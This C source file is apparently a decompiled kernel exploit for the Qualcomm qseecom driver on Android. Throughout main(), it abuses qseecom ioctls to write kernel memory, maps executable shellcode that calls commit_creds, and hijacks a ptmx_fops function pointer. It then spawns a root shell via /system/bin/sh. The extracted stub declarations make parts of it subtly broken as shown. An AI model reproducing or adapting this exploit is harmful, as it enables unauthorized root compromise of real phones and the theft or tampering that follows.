
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct qseecom_set_sb_mem_param_req {int sb_len; int cmd_req_len; int resp_len; TYPE_1__* ifd_data; int ifd_data_fd; void* resp_buf; void* cmd_req_buf; void* virt_sb_base; } ;
struct qseecom_send_modfd_cmd_req {int sb_len; int cmd_req_len; int resp_len; TYPE_1__* ifd_data; int ifd_data_fd; void* resp_buf; void* cmd_req_buf; void* virt_sb_base; } ;
struct TYPE_2__ {int cmd_buf_offset; int fd; } ;


 int MAP_ANONYMOUS ;
 int MAP_FIXED ;
 int MAP_PRIVATE ;
 scalar_t__ MyCommitCred ;
 int PROT_EXEC ;
 int PROT_READ ;
 int PROT_WRITE ;
 int PR_SET_NAME ;
 scalar_t__ PTMX_FOPS ;
 int QSEECOM_IOCTL_SEND_MODFD_CMD_REQ ;
 int QSEECOM_IOCTL_SET_MEM_PARAM_REQ ;
 int execv (char*,char**) ;
 int exit (int) ;
 int g_pid ;
 int g_tgid ;
 int getpid () ;
 int ioctl (int,int ,struct qseecom_set_sb_mem_param_req*) ;
 void* malloc (int) ;
 int memcpy (void*,int ,int) ;
 int memset (void*,int ,int) ;
 void* mmap (int,int,int,int,int,int ) ;
 int obtain_dma_buf_fd (int) ;
 int open (char*,int ) ;
 int perror (char*) ;
 int prctl (int ,char*,int ,int ,int ) ;
 int printf (char*,...) ;
 int run_obtain_root_privilege () ;
 int shell_code2 ;

int main(int argc, char *argv[]){

        printf("mypid %d\n",getpid());
        int ret = -1;

                        int fd = open("/dev/qseecom", 0);
                        if (fd<0){
                         perror("open");
                         exit(-1);
                        }

                        void* abuseBuff = malloc(400);
                        memset(abuseBuff,0,400);

                        int* intArr = (int*)abuseBuff;
                        int j = 0;

                        for(j=0;j<24;j++){

                                        intArr[j] = 0x1;

                        }


                        struct qseecom_send_modfd_cmd_req ioctlBuff;

                        prctl(PR_SET_NAME, "GodFather", 0, 0, 0);



                            g_pid = getpid();
                            g_tgid = g_pid;
                            prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0);


                            struct qseecom_set_sb_mem_param_req req;
                            req.ifd_data_fd = obtain_dma_buf_fd(8192);

                            req.virt_sb_base = abuseBuff;
                            req.sb_len = 8192;

                            ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req);
                            printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n",ret);

                            ioctlBuff.cmd_req_buf = abuseBuff;
                            ioctlBuff.cmd_req_len = 400;
                            ioctlBuff.resp_buf = abuseBuff;
                            ioctlBuff.resp_len = 400;
                            int i = 0;
                            for (i = 0;i<4;i++){
                             ioctlBuff.ifd_data[i].fd = 0;
                             ioctlBuff.ifd_data[i].cmd_buf_offset =0;
                            }
                            ioctlBuff.ifd_data[0].fd = req.ifd_data_fd;
                            ioctlBuff.ifd_data[0].cmd_buf_offset = 0;


                                printf("QSEECOM_IOCTL_SEND_CMD_REQ");
                                ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);


                                printf("return %p %p\n",intArr[0],intArr[1]);
                                perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
                                printf("ioctl return 0x%x \n",ret);


                                void* addr = mmap(intArr[0],4096,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,-1,0);
                                printf("mmap return %p \n",addr);

                                *(int*)addr = 0xE3500000;
                                *((int*)((int)addr+4)) = 0xe1a0f00e;
                                memcpy(addr,shell_code2,400);

                                int* arr = (int*)addr;
                                for(i=0;i<10;i++){
                                 if(arr[i] == 0xeeeeeeee)
                                  arr[i] = (int)MyCommitCred;
                                 printf("%p\n",arr[i]);

                                }


                                ioctlBuff.ifd_data[0].cmd_buf_offset = (int)(PTMX_FOPS + 14*4) - (int)abuseBuff;


                                printf("QSEECOM_IOCTL_SEND_CMD_REQ");
                                ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
                                printf("return %p %p\n",intArr[0],intArr[1]);
                                perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
                                printf("ioctl return 0x%x \n",ret);


                                run_obtain_root_privilege();


                                char * argv1[]={"sh",(char *)0};
                               int result = execv("/system/bin/sh", argv1);
                                if(result){
                                                perror("execv");
                                }

        return 0;


}
